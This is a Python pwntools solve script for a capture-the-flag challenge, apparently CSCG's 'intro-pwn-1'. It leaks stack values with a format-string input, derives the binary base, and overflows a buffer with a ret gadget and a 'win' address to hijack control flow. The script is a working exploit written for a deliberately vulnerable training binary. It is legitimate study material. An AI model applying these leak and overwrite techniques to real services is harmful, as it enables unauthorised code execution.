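"""Solve script for the CSCG "intro-pwn-1" challenge, written with pwntools.

Flow (unchanged from the original script):
  1. connect -- a local ``ncat`` in debug mode, otherwise the challenge host
     built from ``argv[1]``;
  2. answer the "witch name" prompt with a run of ``%p`` format specifiers and
     read back the values the service prints;
  3. take one of those values as a code pointer, subtract a fixed distance to
     get the binary base, and compute two addresses relative to it;
  4. answer the "magic spell" prompt with a fixed-size payload followed by the
     two addresses, then hand the session to the user.

All offsets are specific to the challenge binary this script was written
against; they are taken verbatim from the original script and are not
derived here.
"""
import os  # unused here; kept from the original file
import sys

from pwn import *

# Which whitespace-separated leaked value holds the code pointer the base is
# derived from, and the distance from that pointer down to the binary base.
LEAK_INDEX = 41
LEAK_TO_BASE = 2537
# Addresses relative to the binary base.
WIN_OFFSET = 0x9ec          # the "win" target
RET_GADGET_OFFSET = 0x0b2d  # a lone `ret`; see the alignment note below

# The positional argument is only ever used as the leading label of the
# challenge hostname.
HOST_TEMPLATE = "ncat --ssl {}-1024-intro-pwn-1.challenge.cscg.live 1337"

if args.debug:
    p = process("ncat localhost 1024".split())
else:
    if len(sys.argv) < 2:
        # The original message lost its argument placeholder; name what the
        # argument is actually used for.
        print("USAGE: exploit.py <host-prefix>")
        sys.exit(1)
    p = process(HOST_TEMPLATE.format(sys.argv[1]).split())

# --- 1. leak -----------------------------------------------------------------
p.recvuntil(b"Enter your witch name:")
p.sendline(b"%p " * 50)
leaked = p.recvuntil(b"enter your magic spell:")
# `%p` output is ASCII hex, but the surrounding banner is not under our
# control, so don't let a stray byte abort the run before the dump is shown.
leak_vals = leaked.decode(errors="replace").split(" ")
for i, v in enumerate(leak_vals):
    print(i, "->", v)

# Fail with a readable message instead of an IndexError when the service
# printed fewer values than the hard-coded index expects (e.g. a changed
# banner or a truncated read).
if len(leak_vals) <= LEAK_INDEX:
    print(
        "leak too short: expected at least {} values, got {}".format(
            LEAK_INDEX + 1, len(leak_vals)
        )
    )
    sys.exit(1)

# The base is recomputed on every run, which is only necessary if the binary
# loads at a randomised address (PIE) -- assumed, not verifiable from here.
base = int(leak_vals[LEAK_INDEX], 16) - LEAK_TO_BASE
win = base + WIN_OFFSET
extra_ret = base + RET_GADGET_OFFSET
print("RERET:", hex(extra_ret))
print("WIN:", hex(win))

# --- 2. second prompt --------------------------------------------------------
# Why do we need to realign the stack with another return?
# The `movaps xmmword ptr` instruction requires the stack pointer to be
# 16 byte aligned. Because of this we need to return twice, such that
# the stack pointer moves down another 8 bytes.
#
# Sent as bytes explicitly: recent pwntools versions warn on (and may
# re-encode) str payloads, and the NUL byte must go out unchanged.
# The 13 + 251 byte size is taken from the original script; presumably the
# NUL ends the spell string the service compares against and the rest fills
# the buffer up to the saved return address -- TODO confirm against the binary.
payload = b"Expelliarmus\x00" + b"A" * 251
p.send(payload)
p.send(p64(extra_ret))
p.send(p64(win))
p.send(b"\n")
p.interactive()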